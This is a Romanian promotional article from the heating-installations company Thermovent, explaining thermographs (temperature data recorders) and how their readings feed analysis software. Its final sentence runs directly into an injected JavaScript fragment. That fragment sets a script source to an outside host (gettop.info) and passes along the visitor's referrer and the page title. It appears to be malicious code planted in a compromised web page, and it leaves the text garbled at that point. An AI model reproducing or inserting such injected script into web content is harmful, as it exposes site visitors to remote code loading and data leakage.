descărcare (1)

Proiectarea unui sistem termic de incalzire eficient, cu un randament cat mai bun implica si folosirea unor echipamente speciale de diagnoza si verificare. Acestea au rolul de a indica toti parametrii de functionare a instalatiilor termice si de a inregistra setul de informatii pentru ca acestea sa fie consultate, comparate in vederea luarii de masuri. Thermovent, o companie cu traditie in domeniul instalatiilor electrice, termice si mecanice, de lunga durata, vine sa va ofere servicii complete de consultanta, proiectare, implementare si mentenanta pentru toate categoriile de instalatii mentionate mai devreme. Pentru a oferi un randament cat mai bun al instalatiilor termice, Thermovent va pune la dispozitie o serie completa de echipamente specifice, cum ar fi termografe, senzori dar si alte echipamente de investigare si sondare a instalatiilor de incalzire si termice.

Ce sunt aceste termografe

Prin definitie, aceste termografe sunt echipamente ce sunt echipate cu senzori termici dar si cu sisteme de inregistrare a datelor si formarea de grafice specifice evolutiei parametrilor in timp. Acestea sunt extrem de utile in procesele de proiectare, service si reglaj al instalatiilor termice, iar pentru a putea intelege mai bine aceasta importanta, dorim ca in acest articol sa ne aplecam asupra principiului de funcitonare al acestor echipamente, si mai ales a modului in care acestea trebuiesc utilizate pentru a putea beneficia de o acuratete a citirilor cat mai buna.

Spuneam ca aceste termografe sunt destinate masurarii si inregistrarii de date legate de evolutia temperaturilor din sistemele termice. Acestea pot fi comparate pana la un punct cu termometrele digitale, principiul de functionare fiind axat pe modul in care temperatura influenteaza propietatile electrice ale diferitelor materiale electro-conductoare. Astfel, termometrele digitale, preiau aceste variatii ale proprietatilor electrice si le transforma in informatii si gradatii ale temperaturii. Pana aici, diferentele dintre termometre si termografe inca nu exista, insa daca la termometre  informatiile privind temperatura sunt doar afisate si eventual stocate (la cele prevazute cu memorie digitala) la termografe apar elementele care au rolul de a genera graficele de temperatura.

Functionarea unor termografe

Acestea pot fi produse in doua feluri, fie in format printat, folosind o imprimanta speciala sau, asa cum sunt cele mai performante, in mod digital. Astfel, datele obtinute de catre echipament pot fi incarcate intr-un software de analiza care poate genera rapoarte complexe interpretand in functie de anumite criterii toate informatiile obtinute atat de catre termografe dar si celalalte echipamente de masura (presiune, debit, flux etc.)  si sa ofere rapoarte tehnice complexe ce pot fi utilizate decatre tehnicieni in mentenanta si diagnosticarea sistemelor complexe de incalzire si termice. Thermovent vine sa va ofere toata seria de produse necesare pentru orice companie sau client care doreste sa isi modernizeze sau sa implementeze sisteme performante de incalzire. Pe langa aceste echipamente, va oferim si servicii complete de asistenta prin care venim in ajutorul dumneavoastra atat in procesul de proiectare, implementare si mentenanta pentru instaltii termice si nu numai. Va asteptam pe siteul nostru www.thermovent.ro pentru a gasi cele mai complete solutii pentru dumneavoastra.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;